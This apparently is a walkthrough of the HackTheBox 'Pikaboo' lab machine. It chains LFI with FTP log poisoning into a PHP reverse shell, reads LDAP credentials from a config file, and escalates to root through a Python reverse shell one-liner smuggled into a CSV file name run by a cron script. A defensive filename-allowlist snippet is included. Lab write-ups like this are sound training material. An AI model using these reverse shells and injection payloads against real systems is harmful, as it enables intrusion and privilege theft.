In this post, I would like to share a walkthrough of the Pikaboo machine from HackTheBox.


This machine is rated as Hard difficulty.

Source: HackTheBox

What will you gain from the Pikaboo machine?


For the user flag, you will need to locate a Local File Inclusion vulnerability on the website, which, combined with the FTP service, gives you user privileges on the machine.


As for the root flag, you will need to dig deeper within the machine, especially into the LDAP service, where you will get a username and password for FTP access.

Information Gathering


Once we have started the VPN connection (the configuration file is downloaded from HackTheBox), we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN


Based on the result, we need to map the domain name “pikaboo.htb” to the machine's IP address (for example in /etc/hosts).


Let's open the browser and go straight to the website interface.


Surprisingly, nothing interesting is found on the website.


From the server-status page, we notice a few directories that are worth investigating.


Finally, we can access the directory /admin../admin_staging, which directs us to a dashboard.


By looking at the website URL, I'm fairly sure that the website has a Local File Inclusion vulnerability.


After roaming the directories on the website, I managed to find /var/log/vsftpd.log, which shows the FTP log.

Gaining Privileges Access


First, an NC listener should be running on our terminal to catch the reverse shell connection.


We can use a PHP reverse shell; I have written a cheat sheet for it here.


We need to run ftp pikaboo.htb on the terminal and enter the PHP shell execution code as our username.


To trigger the reverse shell connection, we need to refresh /var/log/vsftpd.log through the Local File Inclusion.


Voila! When we check the NC listener terminal, we see the reverse shell connection back to us.


We can check which user we are running as on the machine.


We can read the user flag by executing the “cat user.txt” command.

Escalate to Root Privileges Access


Sadly, we didn't get any useful information on SUID binaries or from the “sudo -l” command.


From my experience, we can investigate the crontab to see which commands have been running recently, especially those running with root privileges.


When I had fully analyzed the crontab file, I noticed that /usr/local/bin/csvupdate_cron was being run with root privileges.


While analyzing the content of the csvupdate_cron file, we notice that we can abuse the way it processes CSV files.


While roaming inside the server, I noticed a configuration file (/opt/pokeapi/config/settings.php) that looks like the one shown above.


We managed to get the LDAP password from that file, and it might lead us to FTP credentials by running the following command (the password is single-quoted so the shell does not interpret its special characters):

ldapsearch -x -LLL -h 127.0.0.1 -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g' -b 'dc=ftp,dc=pikaboo,dc=htb' -s sub '(objectClass=*)'

The output of the command above contains a base64-encoded password, which we need to decode.


The decoded credentials are as below:

Username: pwnmeow
Password: _G0tT4_C4tcH'3m_4lL!_

We should create a file as below:

touch pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")'; .csv"

We need to access the machine via the FTP service using the credentials we found earlier.


Once we have successfully logged in via FTP, we should change to any subdirectory on the FTP service.


Finally, we need to upload the reverse shell payload as follows:

put  pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")'; .csv"

### We need to start our NC listener before running the command above ###


Based on the crontab configuration, it will take around 1 minute to get the reverse shell connection back to us.
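The chain above works only because a file name from the FTP upload directory reaches a command line unchecked. As an added, defender-side example (not the machine's own csvupdate_cron script, whose source is not reproduced in this post), the following Python shows how a cron importer can allowlist CSV names and pass paths as single arguments; the directory layout, file names and allowlist pattern are constructed for the demo.

```python
import csv
import re
import sys
import subprocess
import tempfile
from pathlib import Path

# Allowlist for names a cron-driven importer will accept: letters, digits, "_" and "-",
# then exactly one ".csv" suffix. Anything else ("|", ";", quotes, spaces, "../") is refused.
SAFE_CSV_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.csv$")

def is_safe_csv_name(name: str) -> bool:
    """True only for a bare basename that matches the allowlist."""
    return Path(name).name == name and SAFE_CSV_NAME.fullmatch(name) is not None

def select_csv_files(upload_dir: Path) -> tuple[list[Path], list[str]]:
    """Partition an FTP upload directory into files safe to process and names to quarantine."""
    accepted, rejected = [], []
    for entry in sorted(upload_dir.iterdir()):
        if entry.is_file() and is_safe_csv_name(entry.name):
            accepted.append(entry)
        else:
            rejected.append(entry.name)  # logged/quarantined, never handed to a shell
    return accepted, rejected

def count_data_rows(csv_path: Path) -> int:
    """Process one accepted file in a helper process. The path travels as a single argv
    element (no shell=True, no string building), so metacharacters in a name stay data."""
    helper = "import csv,sys;print(sum(1 for _ in csv.reader(open(sys.argv[1], newline=''))) - 1)"
    out = subprocess.run([sys.executable, "-c", helper, str(csv_path)],
                         capture_output=True, text=True, check=True)
    return int(out.stdout.strip())

def demo() -> dict:
    """Constructed sample upload directory: one legitimate CSV and one hostile file name."""
    with tempfile.TemporaryDirectory() as tmp:
        upload = Path(tmp)
        with open(upload / "trainers.csv", "w", newline="") as fh:
            csv.writer(fh).writerows([["id", "name"], ["1", "pwnmeow"], ["2", "ash"]])
        (upload / "pikaboo;id .csv").write_text("")  # constructed: shell metacharacters in the name
        accepted, rejected = select_csv_files(upload)
        return {"accepted": [p.name for p in accepted], "rejected": rejected,
                "rows": {p.name: count_data_rows(p) for p in accepted}}
```

A rejected name should be logged with the uploading account, since a file named like the payload above is a reliable sign of an attempted injection.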


We have successfully gained root privileges.


We can read the root flag by executing the command “cat root.txt” and submit the flag on the HackTheBox website.


-THE END-


Happy Learning Guys!

Extra Information


We can use /etc/shadow to unlock the official write-up.